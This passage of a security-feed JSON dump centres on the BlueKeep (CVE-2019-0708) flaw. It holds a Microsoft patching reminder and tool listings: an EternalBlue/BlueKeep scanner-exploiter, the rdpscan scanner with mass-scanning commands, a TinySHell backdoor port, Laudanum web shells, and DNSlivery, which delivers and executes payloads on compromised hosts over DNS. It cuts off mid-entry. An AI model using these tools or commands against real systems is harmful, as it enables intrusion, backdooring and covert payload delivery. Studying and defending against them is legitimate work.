It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise. This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\n\nIt's been only two weeks since the fix was released and there has been no sign of a worm yet. This does not mean that we\u2019re out of the woods. If we look at the events leading up to the start of the WannaCry attacks, they serve to inform the risks of not applying fixes for this vulnerability in a timely manner.\n\n**Our recommendation remains the same. We strongly advise that all affected systems should be updated as soon as possible.**\n\nIt is possible that we won\u2019t see this vulnerability incorporated into malware.\n\nBut that\u2019s not the way to bet.\n\n**EternalBlue Timeline**\n\nAlmost two months passed between the release of fixes for the EternalBlue vulnerability and when ransomware attacks began. Despite having nearly 60 days to patch their systems, many customers had not.\n\nA significant number of these customers were infected by the ransomware.\n\n**March 14, 2017:** Microsoft releases [security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) which includes fixes for a set of SMBv1 vulnerabilities.\n\n**April 14, 2017:** [ShadowBrokers publicly releases a set of exploits](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>), including a wormable exploit known as 'EternalBlue' that leverages these SMBv1 vulnerabilities.\n\n**May 12, 2017:** [The EternalBlue exploit is used in ransomware attacks known as WannaCry](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>). 
Hundreds of thousands of vulnerable computers across the globe are infected.\n\n**Resources** \n[Links to downloads for Windows 7, Windows 2008 R2, and Windows 2008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)\n[Links to downloads for Windows Vista, Windows 2003 and Windows XP](<https://support.microsoft.com/help/4500705>)\n\n_Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC)_", "modified": "2019-05-31T05:53:28", "published": "2019-05-31T05:53:28", "id": "MSRC:4D3D99779455BE99499289F3B3A35F84", "href": "https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/", "type": "msrc", "title": "A Reminder to Update Your Systems to Prevent a Worm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2020-12-08T05:23:44", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://1.bp.blogspot.com/-qZPJhRorVMI/XZq0ctzzFKI/AAAAAAAAQik/H4F3k-V5m3s3fUtxBbpoR_TKVpi5Vp2gwCNcBGAsYHQ/s1600/ispy_1.png>)\n\n \nispy : Eternalblue(ms17-010)/Bluekeep(CVE-2019-0708) [ Scanner ](<https://www.kitploit.com/search/label/Scanner> \"Scanner\" ) and exploiter ( [ Metasploit ](<https://www.kitploit.com/search/label/Metasploit> \"Metasploit\" ) [ automation ](<https://www.kitploit.com/search/label/Automation> \"automation\" ) ) \n \n** How to install : ** \n\n \n \n git clone https://github.com/Cyb0r9/ispy.git\n cd ispy\n chmod +x setup.sh\n ./setup.sh\n\n \n** Screenshots : ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-HQs7rcHIQxM/XZq0mM6aJQI/AAAAAAAAQio/6S3e2ulFtdgBw8-HT28BMkiqIxzT3T70ACNcBGAsYHQ/s1600/ispy_2.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-tKdxGMv8vjM/XZq0mfcIx3I/AAAAAAAAQis/it_vb80HgNQu-hiz3763YkbD2FZGBj06QCNcBGAsYHQ/s1600/ispy_3.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-rCLDAx1_XIk/XZq0mcy3KNI/AAAAAAAAQiw/UUWZ7-uF9dMsUcqLEFBmFEGWTs2RMJyjQCNcBGAsYHQ/s1600/ispy_4.png>)\n\n 
\n\n\n[  ](<https://1.bp.blogspot.com/-sQ1Rj5Qcj9k/XZq0nHBDLzI/AAAAAAAAQi0/UlQ0mARnB7AVE6pNRbGV3IrGNg3eUw2WQCNcBGAsYHQ/s1600/ispy_5.png>)\n\n \n \n** Tested On : ** \n\n\n * Parrot OS \n * Kali Linux \n \n** Tutorial ( How to use ispy ) ** \n \n\n\n \n** info ** \n\n\n * GitHub profile : [ https://github.com/Cyb0r9 ](<https://github.com/Cyb0r9> \"https://github.com/Cyb0r9\" )\n * YouTube channel: [ https://youtube.com/c/Cyborg_TN ](<https://youtube.com/c/Cyborg_TN> \"https://youtube.com/c/Cyborg_TN\" )\n * Ask Fm (ask me): [ https://ask.fm/Cyborg_TN ](<https://ask.fm/Cyborg_TN> \"https://ask.fm/Cyborg_TN\" )\n * E-mail address : [email protected] \n \n** Disclaimer : ** \n \n** usage of ispy for attacking targets without prior mutual consent is illegal. ** \n** ispy is for security [ testing ](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only ** \n \n \n\n\n** [ Download Ispy ](<https://github.com/Cyb0r9/ispy> \"Download Ispy\" ) **\n", "edition": 176, "modified": "2019-10-09T21:00:10", "published": "2019-10-09T21:00:10", "id": "KITPLOIT:4482238198881011483", "href": "http://www.kitploit.com/2019/10/ispy-eternalblue-ms17-010-bluekeep-cve.html", "title": "Ispy - Eternalblue (MS17-010) / Bluekeep (CVE-2019-0708) Scanner And Exploit", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-08T15:24:28", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://1.bp.blogspot.com/-AXPv9x_hlIY/XQnJG2GfqKI/AAAAAAAAPWs/DOe7OHqDWd4ph2U3_ECeWZJGFJ8ZrEQXQCLcBGAs/s1600/rdpscan.jpg>)\n\n \n\n\nThis is a quick-and-dirty scanner for the CVE-2019-0708 [ vulnerability ](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) in [ Microsoft ](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Remote Desktop. 
Right now, there are about 900,000 machines on the public Internet [ vulnerable ](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to this vulnerability, so many expect a worm soon, like WannaCry and notPetya. Therefore, scan your networks and patch (or at least, enable NLA) on vulnerable systems. \n\nThis is a command-line tool. You can download the source and compile it yourself, or you can download one of the pre-compiled binaries for Windows or macOS from the link above. \n\nThis tool is based entirely on the ` rdesktop ` patch from [ https://github.com/zerosum0x0/CVE-2019-0708 ](<https://github.com/zerosum0x0/CVE-2019-0708> \"https://github.com/zerosum0x0/CVE-2019-0708\" ) . \n\n \n** Primary use ** \nTo scan a network, run it like the following: \n\n \n \n rdpscan 192.168.1.1-192.168.1.255\n\nThis produces one of 3 results for each address: \n\n\n * SAFE - if the target has been determined to be _ patched _ or at least requires _ CredSSP/NLA _\n * VULNERABLE - if the target has been confirmed to be vulnerable \n * UNKNOWN - if the target doesn't respond or has some protocol failure \nWhen nothing exists at a target IP address, the older versions printed the message \" _ UNKNOWN - connection timed out _ \". When scanning large networks, this produces an overload of too much information about systems you don't care about. Therefore, the new version by default doesn't produce this information unless you add _ -v _ (for verbose) on the command-line. \nYou can increase the speed at which it scans large networks by increasing the number of workers: \n\n \n \n rdpscan --workers 10000 10.0.0.0/8\n\nHowever, on my computer, it only produces about 1500 workers, because of system limitations, no matter how high I configure this parameter. \nYou can increase the speed even more by using this in conjunction with ` masscan ` , described in the section below. 
\n \n** Interpreting the results ** \nThere are three general responses: \n\n\n * _ SAFE _ \\- which means the target is probably patched or otherwise not vulnerable to the bug. \n * _ VULNERABLE _ : which means we've confirmed the target is vulnerable to this bug, and that when the worm hits, it will likely get infected. \n * _ UNKNOWN _ : means we can't confirm either way, usually because the target doesn't respond or isn't running RDP, which is the vast majority of responses. Also, when targets are out of resources or experiencing network problems, we'll get a lot of these. Finally, protocol errors are responsible for a lot. While the three main responses are _ SAFE _ , _ VULNERABLE _ , and _ UNKNOWN _ , they contain additional text explaining the diagnosis. This section describes the various strings you'll see. \n \n** SAFE ** \nThere are three main reasons we think a target is safe: \n\n\n * _ SAFE - Target appears patched _ This happens when the target doesn't respond to the triggering request. This means it's a Windows system that's been patched, or a system that wasn't vulnerable to begin with, like Windows 10 or Unix. \n * _ SAFE - CredSSP/NLA required _ This means that the target first requires Network Level Authentication before the RDP connection can be established. The tool cannot pass this point, without legitimate credentials, so cannot determine whether the target has been patched. However, hackers can't continue past this point to exploit vulnerable systems, either, so you are likely \"safe\". However, when exploits appear, insiders with valid usernames/passwords will be able to exploit the system if it's un-patched. \n * _ SAFE - not RDP _ This means the system is not RDP, but has some other service that happens to use this same port, and produces a response that's clearly not RDP. Common examples are HTTP and SSH. Note however that instead of an identifiable protocol, a server may respond with a RST or FIN packet. 
These are identified as _ UNKNOWN _ instead of _ SAFE _. \n \n** VULNERABLE ** \nThis means we've confirmed the system is vulnerable to the bug. \n\n\n * _ VULNERABLE - got appid _ There is only one response when the system is vulnerable, this one. \n \n** UNKNOWN ** \nThere are a zillion variations for unknown: \n\n\n * _ UNKNOWN - no connection - timeout _ This is by far the most common response, and happens when the target IP address makes no response whatsoever. In fact, it's so common that when scanning large ranges of addresses, it's usually omitted. You have to add the _ -v _ (verbose) flag in order to enable it. \n * _ UNKNOWN - no connection - refused (RST) _ This is by far the second most common response, and happens when the target exists and responds to network traffic, but isn't running RDP, so refuses the connection with a TCP RST packet. \n * _ UNKNOWN - RDP protocol error - receive timeout _ This is the third most common response, and happens when we've successfully established an RDP connection, but then the server stops responding to us. This is due to network errors and when the target system is overloaded for some reason. It could also be network errors on this end, such as when you are behind a NAT and overloading it with too many connections. \n * _ UNKNOWN - no connection - connection closed _ This means we've established a connection (TCP SYN-ACK), but then the connection is immediately closed (with a RST or FIN). There are many reasons this happens, which we cannot distinguish: \n * It's running RDP, but for some reason closes the connection, possibly because it's out-of-resources. \n * It's not RDP, and doesn't like the RDP request we send it, so instead of sending us a nice error message (which would trigger _ SAFE - not RDP _ ), it abruptly closes the connection. \n * Some intervening device, like an IPS, firewall, or NAT closed the connection because it identified this as hostile, or ran out of resources. 
\n * Some other reason I haven't identified; there's a lot of weird stuff happening when I scan the Internet. \n * _ UNKNOWN - no connection - host unreachable (ICMP error) _ The remote network reports the host cannot be reached or is not running. Try again later if you think that host should be alive. \n * _ UNKNOWN - no connection - network unreachable (ICMP error) _ There is a (transient) network error on the far end, try again later if you believe that network should be running. \n * _ UNKNOWN - RDP protocol error _ This means some corruption happened in the RDP protocol, either because the remote side implements it wrong (not a Windows system), because it's handling a transient network error badly, or something else. \n * _ UNKNOWN - SSL protocol error _ Since Windows Vista, RDP uses the STARTTLS protocol to run over SSL. This layer has its own problems like above, which includes handling underlying network errors badly, or trying to communicate with systems that have some sort of incompatibility. If you get a very long error message here (like SSL3_GET_RECORD:wrong version), it's because the other side has a bug in SSL, or your own SSL library that you are using has a bug. \n \n** Using with masscan ** \nThis ` rdpscan ` tool is fairly slow, only scanning a few hundred targets per second. You can instead use [ ` masscan ` ](<https://github.com/robertdavidgraham/masscan> \"A quick scanner for the CVE-2019-0708 BlueKeep vulnerability. \\(11\\)\" ) to speed things up. The ` masscan ` tool is roughly 1000 times faster, but only gives limited information on the target. \nThe steps are: \n\n\n * First, scan the address ranges with masscan to quickly find hosts that respond on port 3389 (or whatever port you use). \n * Second, feed the output of ` masscan ` into ` rdpscan ` , so it only has to scan targets we know are active. 
\nThe simple way to run this is just to combine them on the command-line: \n\n \n \n masscan 10.0.0.0/8 -p3389 | rdpscan --file -\n\nThe way I do it is in two steps: \n\n \n \n masscan 10.0.0.0/8 -p3389 > ips.txt\n rdpscan --file ips.txt --workers 10000 >results.txt\n\n \n** Building ** \nThe difficult part is getting the _ OpenSSL _ libraries installed, and not conflicting with other versions on the system. Some examples for versions of Linux I've tested on are the following, but they keep changing package names from one distribution to the next. Also, there are many options for an OpenSSL-compatible API, such as BoringSSL and LibreSSL. \n\n \n \n $ sudo apt install libssl-dev\n $ sudo yum install openssl-devel\n\nOnce you've solved that problem, you just compile all the ` .c ` files together like this: \n\n \n \n $ gcc *.c -lssl -lcrypto -o rdpscan\n\nI've put a Makefile in the directory that does this, so you can likely do just: \n\n \n \n $ make\n\nThe code is written in C, so it needs a C [ compiler ](<https://www.kitploit.com/search/label/Compiler> \"compiler\" ) installed, which you can get by doing the following: \n\n \n \n $ sudo apt install build-essential\n\n \n** Common build errors ** \nThis section describes the more obvious build errors. \n\n \n \n ssl.h:24:25: fatal error: openssl/rc4.h: No such file or directory\n\nThis means you either don't have the OpenSSL headers installed, or they aren't on the include path. Remember that even if you have OpenSSL binaries installed, this doesn't mean you've got the development files installed. You need both the headers and libraries installed. \nTo install these things on Debian, do: \n\n \n \n $ sudo apt install libssl-dev\n\nTo fix the path issue, add a compilation flag ` -I/usr/local/include ` , or something similar. 
\nAn example linker problem is the following: \n\n \n \n Undefined symbols for architecture x86_64:\n \"_OPENSSL_init_ssl\", referenced from:\n _tcp_tls_connect in tcp-fac73c.o\n \"_RSA_get0_key\", referenced from:\n _rdssl_rkey_get_exp_mod in ssl-d5fdf5.o\n \"_SSL_CTX_set_options\", referenced from:\n _tcp_tls_connect in tcp-fac73c.o\n \"_X509_get_X509_PUBKEY\", referenced from:\n _rdssl_cert_to_rkey in ssl-d5fdf5.o\n\nI get this on macOS because there are multiple versions of OpenSSL. I fix this by hard-coding the paths: \n\n \n \n $ gcc *.c -lssl -lcrypto -I/usr/local/include -L/usr/local/lib -o rdpscan\n\nAccording to comments by others, the following command-line might work on macOS if you've used Homebrew to install things. I still get the linking errors above, though, because I've installed other OpenSSL components that are conflicting. \n\n \n \n gcc $(brew --prefix)/opt/openssl/lib/libssl.a $(brew --prefix)/opt/openssl/lib/libcrypto.a -o rdpscan *.c\n\n \n** Running ** \nThe section above gives quickstart tips for running the program. This section gives more in-depth help. \nTo scan a single target, just pass the address of the target: \n\n \n \n ./rdpscan 192.168.10.101\n\nYou can pass in IPv6 addresses and DNS names. You can pass in multiple targets. An example of this would be: \n\n \n \n ./rdpscan 192.168.10.101 exchange.example.com 2001:0db8:85a3::1\n\nYou can also scan ranges of addresses, using either begin-end IPv4 address ranges or IPv4 CIDR notation. IPv6 ranges aren't supported because they are so big. \n\n \n \n ./rdpscan 10.0.0.1-10.0.0.25 192.168.0.0/16\n\nBy default, it scans only 100 targets at a time. You can increase this number with the ` --workers ` parameter. However, no matter how high you set this parameter, in practice you'll get a maximum of around 500 to 1500 workers running at once, depending upon your system. 
\n\n \n \n ./rdpscan --workers 1000 10.0.0.0/24\n\nInstead of specifying targets on the command-line, you can load them from a file, using the well-named ` --file ` parameter: \n\n \n \n ./rdpscan --file ips.txt\n\nThe format of the file is one address, name, or range per line. It can also consume the text generated by ` masscan ` . Extra whitespace is trimmed, blank lines are ignored, and any comment lines are ignored. A _ comment _ is a line starting with the ` # ` character, or ` // ` characters. \nThe output is sent to ` stdout ` giving the status of VULNERABLE, SAFE, or UNKNOWN. There could be additional reasons for each. These reasons are described above. \n\n \n \n 211.101.37.250 - SAFE - CredSSP/NLA required\n 185.11.124.79 - SAFE - not RDP - SSH response seen\n 125.121.137.42 - UNKNOWN - no connection - refused (RST)\n 40.117.191.215 - SAFE - CredSSP/NLA required\n 121.204.186.182 - SAFE - CredSSP/NLA required\n 99.8.11.148 - SAFE - CredSSP/NLA required\n 121.204.186.114 - SAFE - CredSSP/NLA required\n 49.50.145.236 - SAFE - CredSSP/NLA required\n 106.12.74.155 - VULNERABLE - got appid\n 222.84.253.26 - SAFE - CredSSP/NLA required\n 144.35.133.109 - UNKNOWN - RDP protocol error - receive timeout\n 199.212.226.196 - UNKNOWN - RDP protocol error - receive timeout\n 183.134.58.152 - UNKNOWN - no connection - refused (RST)\n 83.162.246.149 - VULNERABLE - got appid\n\nYou can process this with additional Unix commands like ` grep ` and ` cut ` . To get a list of just vulnerable machines: \n\n \n \n ./rdpscan 10.0.0.0/8 | grep 'VULN' | cut -f1 -d'-'\n\nThe parameter ` -dddd ` means _ diagnostic _ information, where the more ` d ` s you add, the more details are printed. This is sent to ` stderr ` instead of ` stdout ` so that you can separate the streams. 
Using ` bash ` , this is done like this: \n\n \n \n ./rdpscan --file myips.txt -ddd 2> diag.txt 1> results.txt\n\n \n** Diagnostic info ** \nAdding the ` -d ` parameter dumps diagnostic info on the connections to ` stderr ` . \n\n \n \n ./rdpscan 62.15.34.157 -d\n \n [+] [62.15.34.157]:3389 - connecting...\n [+] [62.15.34.157]:3389 - connected from [10.1.10.133]:49211\n [+] [62.15.34.157]:3389 - SSL connection\n [+] [62.15.34.157]:3389 - version = v4.8\n [+] [62.15.34.157]:3389 - Sending MS_T120 check packet\n [-] [62.15.34.157]:3389 - Max sends reached, waiting...\n 62.15.34.157 - SAFE - Target appears patched\n\nOn macOS/Linux, you can redirect ` stdout ` and ` stderr ` separately to different files in the usual manner: \n\n \n \n ./rdpscan --file ips.txt 2> diag.txt 1> results.txt\n\n \n** SOCKS5 and Tor lulz ** \nSo it includes SOCKS5 support: \n\n \n \n ./rdpscan --file ips.txt --socks5 localhost --socks5port 9050\n\nIt makes connection problems worse, so you get a lot more \"UNKNOWN\" results. \n \n** Statically link OpenSSL ** \nFor releasing the Windows and macOS binaries attached as _ releases _ to this project I statically link OpenSSL, so that it doesn't need to be included separately, and the programs _ just work _ . This section describes some notes on how to do this, especially since the description on OpenSSL's own page seems to be out of date. \nBoth of these procedures start with downloading the OpenSSL source and putting it next to the ` rdpscan ` directory: \n\n \n \n git clone https://github.com/openssl/openssl\n\n \n** Windows ** \nFor Windows, you need to first install some version of Perl. I use the one from [ ActiveState ](<https://www.activestate.com/ActivePerl> \"ActiveState\" ) . \nNext, you'll need a special \"assembler\". I use the recommended one called [ NASM ](<http://nasm.sourceforge.net/> \"NASM\" ) . \nNext, you'll need a compiler. I use Visual Studio 2010. 
You can download the latest \"Visual Studio Community Edition\" (which is 2019) instead from Microsoft. \nNow you need to build the makefile. This is done by going into the OpenSSL directory and running the ` Configure ` Perl program: \n\n \n \n perl Configure VC-WIN32\n\nI chose 32-bit for Windows because there's a lot of old Windows out there, and I want to make the program as compatible as possible with old versions. \nI want a completely static build, including the C runtime. To do that, I opened the resulting makefile in an editor, and changed the C compilation flag from ` /MD ` (meaning use DLLs) to ` /MT ` . While I was there, I added the following to the CPPFLAGS ` -D_WIN32_WINNT=0x501 ` , which restricts OpenSSL to features that work back on Windows XP and Server 2003. Otherwise, you get errors that ` bcrypt.dll ` was not found if you run on those older systems. \nNow you'll need to make sure everything is in your path. I copied ` nasm.exe ` to a directory in the PATH. For Visual Studio 2010, I ran the program ` vcvars32.bat ` to set up the path variables for the compiler. \nAt this point on the command-line, I typed: \n\n \n \n nmake\n\nThis makes the libraries. The static ones are ` libssl_static.lib ` and ` libcrypto_static.lib ` , which I use to link to in ` rdpscan ` . \n \n** macOS ** \nFirst of all, you need to install a compiler. I use the Developer Tools from Apple, installing Xcode and the compiler. I think you can use Homebrew to install ` gcc ` instead. \nThen go into the source directory for OpenSSL and create a makefile: \n\n \n \n perl Configure darwin64-x86_64-cc\n\nNow simply make it: \n\n \n \n make depend\n make\n\nAt this point, it's created both dynamic ( ` .dylib ` ) and static ( ` .lib ` ) libraries. I deleted the dynamic libraries so that it'll catch the static ones by default. 
\nNow in ` rdpscan ` , just build the macOS makefile: \n\n \n \n make -f Makefile.macos\n\nThis will compile all the ` rdpscan ` source files, then link to the OpenSSL libraries in the directory ` ../openssl ` that you just built. \nThis should produce a 3-megabyte executable. If you instead only got a 200-kilobyte executable, then you made a mistake and linked to the dynamic libraries instead. \n \n \n\n\n** [ Download Rdpscan ](<https://github.com/robertdavidgraham/rdpscan> \"Download Rdpscan\" ) **\n", "edition": 9, "modified": "2019-06-19T12:32:00", "published": "2019-06-19T12:32:00", "id": "KITPLOIT:998955151150716619", "href": "http://www.kitploit.com/2019/06/rdpscan-quick-scanner-for-cve-2019-0708.html", "title": "Rdpscan - A Quick Scanner For The CVE-2019-0708 \"BlueKeep\" Vulnerability", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:35:16", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": " \n\n\n[  ](<https://1.bp.blogspot.com/-nBFEtVryKZQ/UmXHnE9md6I/AAAAAAAABHc/OdhQsG_ruZ8/s1600/sctp_camion.png>)\n\nYou may have seen, a while ago, my post on SCTP reverse shells. \n\n \n\n\nI realized quite quickly that I should definitely do some more research in this direction, and hence ported one of my favourite Unix backdoors (which uses a TCP connection) to use an SCTP connection instead. This backdoor allows for a remote PTY, file upload, and file download. It also uses an encrypted connection. \n\n \n\n\nThe backdoor in question is \u2018TinySHell\u2019 by the inestimable Christophe Devine (who left quite a legacy of code, which I may start to maintain as he appears to have vanished. Chris, if you are out there, get in touch or something! Love your work!). I spent a short while examining the code, then quickly patched it up to replace all the TCP stuff with SCTP stuff. I imagine I could easily alter it to do UDP, and might try that later. 
\n\n \n\n\nAnyways, without further ado, here is the code. Again, all credit to Chris, all I did was modify it! \n\n \n\n\n \n\n\n[ ** Download TinySHell ** ](<https://github.com/infodox/tsh-sctp>)\n", "edition": 14, "modified": "2013-10-22T00:34:40", "published": "2013-10-22T00:34:40", "id": "KITPLOIT:102871766956097088", "href": "http://www.kitploit.com/2013/10/tinyshell-ported-to-sctp.html", "title": "[TinySHell] Ported to SCTP", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:33:05", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found, and available in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others. \n\n \n\n\n** [ Download Laudanum ](<https://sourceforge.net/projects/laudanum/>) **\n", "edition": 18, "modified": "2013-11-04T03:15:39", "published": "2013-11-04T03:15:39", "id": "KITPLOIT:6082359615438809301", "href": "http://www.kitploit.com/2013/11/laudanum-collection-of-injectable-files.html", "title": "[Laudanum] Collection of injectable files", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-09T05:23:11", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://1.bp.blogspot.com/-e0paxhHNyac/XQqp5BUAP_I/AAAAAAAAPW4/NqRlJZK5We4bMj8xKnKw6nfv7FXdUpW1ACLcBGAs/s1600/DNSlivery_3_demo-target.gif>)\n\n \nEasy files and payloads delivery over DNS. \n \n** Acknowledgments ** \nThis project was originally inspired by [ PowerDNS ](<https://github.com/mdsecactivebreach/PowerDNS> \"PowerDNS\" ) and [ Joff Thyer ](<https://twitter.com/joff_thyer> \"Joff Thyer\" ) 's technical segment on the Paul's Security Weekly podcast #590 ( [ youtu.be/CP6cIwFJswQ ](<https://youtu.be/CP6cIwFJswQ> \"youtu.be/CP6cIwFJswQ\" ) ). 
\n \n** Description ** \n \n** TL;DR ** \nDNSlivery allows delivering files to a target using DNS as the transport protocol. \n** Features ** : \n\n\n * prints, executes or saves files on the target \n * does not require any client on the target \n * does not require a full-fledged DNS server \n \n** What problem are you trying to solve? ** \nEasily deliver files and/or payloads to a compromised target where classic web delivery is not possible and ** without the need for dedicated client software ** . This applies to restricted environments where outgoing web traffic is forbidden or simply inspected by a curious web proxy. \n \n\n\n[  ](<https://1.bp.blogspot.com/-x0ICbNpRu4k/XQqqAsIstHI/AAAAAAAAPW8/rN5CfObKlz8qQfVjEqfF1TN05Cz2RZ5rQCLcBGAs/s1600/DNSlivery_4_web-delivery-blocked.png>)\n\n \nEven though more complete DNS [ tunneling ](<https://www.kitploit.com/search/label/Tunneling> \"tunneling\" ) tools already exist (such as [ dnscat2 ](<https://github.com/iagox86/dnscat2> \"dnscat2\" ) and [ iodine ](<https://code.kryo.se/iodine/> \"iodine\" ) ), they all require running a dedicated client on the target. The problem is that there is probably no other way than DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools requires already having a DNS communication channel. \nIn comparison, DNSlivery only provides one-way communication from your server to the target, but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more advanced DNS tunneling tool to your target. \n \n** How does it work? ** \nJust like most DNS tunneling tools, DNSlivery uses ` TXT ` records to store the content of files in their base64 representation. However, it does not require setting up a full-fledged DNS server to work. 
Instead, it uses the [ scapy ](<https://scapy.net/> \"scapy\" ) library to listen for incoming DNS [ packets ](<https://www.kitploit.com/search/label/Packets> \"packets\" ) and craft the desired response. \n \n\n\n[  ](<https://1.bp.blogspot.com/-QclJ3myyZEo/XQqqEz5MBWI/AAAAAAAAPXA/93NUqYwQkv8Offzkopg-kmDaUFIj6n_6wCLcBGAs/s1600/DNSlivery_5_network-process.png>)\n\n \nAs most files do not fit in a single ` TXT ` record, DNSlivery will create multiple ordered records containing base64 chunks of the file. As an example, the above [ diagram ](<https://www.kitploit.com/search/label/Diagram> \"diagram\" ) illustrates the delivery of the 42nd chunk of the file named ` file ` . \nIn order to retrieve all base64 chunks and put them back together without the need for a dedicated client on the target, DNSlivery will generate for every file: \n\n\n * a simple cleartext launcher \n * a reliable base64 encoded stager \n\n[  ](<https://1.bp.blogspot.com/-nYvVNnBPX90/XQqqJQYdpzI/AAAAAAAAPXI/JjeZ9JVhGTEmPCJfMLMImxmYfMTIDB2FgCLcBGAs/s1600/DNSlivery_6_two-stages-delivery.png>)\n\n \nThis two-stage delivery process is required to add features to the stager (such as handling lost DNS responses) that would otherwise not fit in a single ` TXT ` record. \n \n** Note on target compatibility ** \nCurrently, only [ PowerShell ](<https://www.kitploit.com/search/label/PowerShell> \"PowerShell\" ) targets are supported. However, DNSlivery could be improved to support additional targets such as bash or python. Please let me know [ @no0be ](<https://twitter.com/no0be> \"@no0be\" ) if this is a feature that you would like to see implemented. \n \n** Requirements ** \nDNSlivery does not require building a complex server infrastructure. 
In fact, there are only two simple requirements: \n\n\n * be able to create a ` NS ` record in your public DNS zone \n * have a Linux server capable of receiving ` udp/53 ` traffic from the Internet \n \n** Setup ** \n \n** DNS Zone ** \nThe first step is to delegate a sub-domain to the server that will run DNSlivery by creating a new ` NS ` record in your domain. As an example, I created the following record to delegate the sub-domain ` dnsd.no0.be ` to the server at ` vps.no0.be ` . \n\n \n \n dnsd IN NS vps.no0.be.\n\nIf your zone is managed by a third-party provider, refer to their documentation to create the ` NS ` record. \n \n** DNSlivery ** \nThe only [ requirements ](<https://www.kitploit.com/search/label/Requirements> \"requirements\" ) to run DNSlivery are ` python3 ` and its ` scapy ` library. \n\n \n \n git clone https://github.com/no0be/DNSlivery.git && cd DNSlivery\n pip install -r requirements.txt\n\n \n** Usage ** \n \n** Server ** \nDNSlivery will serve all files of a given directory ( ` pwd ` by default) and needs to be ** run with root privileges ** to listen for incoming ` udp/53 ` packets. 
\n\n \n \n usage: dnslivery.py [-h] [-p PATH] [-s SIZE] [-v] interface domain nameserver\n \n DNSlivery - Easy files and payloads delivery over DNS\n \n positional arguments:\n interface interface to listen to DNS traffic\n domain FQDN name of the DNS zone\n nameserver FQDN name of the server running DNSlivery\n \n optional arguments:\n -h, --help show this help message and exit\n -p PATH, --path PATH path of directory to serve over DNS (default: pwd)\n -s SIZE, --size SIZE size in bytes of base64 chunks (default: 255)\n -v, --verbose increase verbosity\n\n** Example ** : \n\n \n \n $ sudo python3 dnslivery.py eth0 dnsd.no0.be vps.no0.be -p /tmp/dns-delivery\n \n DNSlivery - Easy files and payloads delivery over DNS\n \n [*] File \"file\" ready for delivery at file.dnsd.no0.be (7 chunks)\n [*] Listening for DNS queries...\n\n \n** Note on filename normalization ** \nAs the charset allowed for domain names is much more restrictive than for UNIX filenames (per [ RFC1035 ](<https://tools.ietf.org/html/rfc1035#section-2.3.1> \"RFC1035\" ) ), DNSlivery will perform normalization when required. \n** Example ** : \n\n \n \n [*] File \"My Awesome Powershell Script ;).ps1\" ready for delivery at my-awesome-powershell-script----ps1.dnsd.no0.be (1891 chunks)\n\n** Be aware that the current normalization code is not perfect as it does not take overlapping filenames or size limit into account. ** \n \n** Target ** \nOn the target, start by ** retrieving the launcher ** of the desired file by requesting its dedicated ` TXT ` record. 
The following three launchers are supported: \nAction | Launcher | Description \n---|---|--- \nPrint | ` [filename].print.[domain] ` | ( ** Default ** ) Print the delivered file to the console \nExecute | ` [filename].exec.[domain] ` | Execute the delivered file (useful for scripts) \nSave | ` [filename].save.[domain] ` | Save the delivered file to disk (useful for binaries) \n \n \n nslookup -type=txt [filename].[stager].[domain]\n\nThen, simply ** copy and paste the launcher quoted in the DNS response to a PowerShell console ** to retrieve the file on the target. \n \n** Example ** : \n\n\n[  ](<https://1.bp.blogspot.com/-fWsZsKlCbRw/XQqqQvQpRwI/AAAAAAAAPXM/21Nz9H1Ia4Qbp_jGyyqrwgcrH3YXwYMkwCLcBGAs/s1600/DNSlivery_7_demo-target.gif>)\n\n \n \n\n\n** [ Download DNSlivery ](<https://github.com/no0be/DNSlivery> \"Download DNSlivery\" ) **\n", "edition": 11, "modified": "2019-06-19T21:35:34", "published": "2019-06-19T21:35:34", "id": "KITPLOIT:7589415140458130624", "href": "http://www.kitploit.com/2019/06/dnslivery-easy-files-and-payloads.html", "title": "DNSlivery - Easy Files And Payloads Delivery Over DNS", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-21T09:54:47", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "ARPwner is a tool to do ARP poisoning and DNS 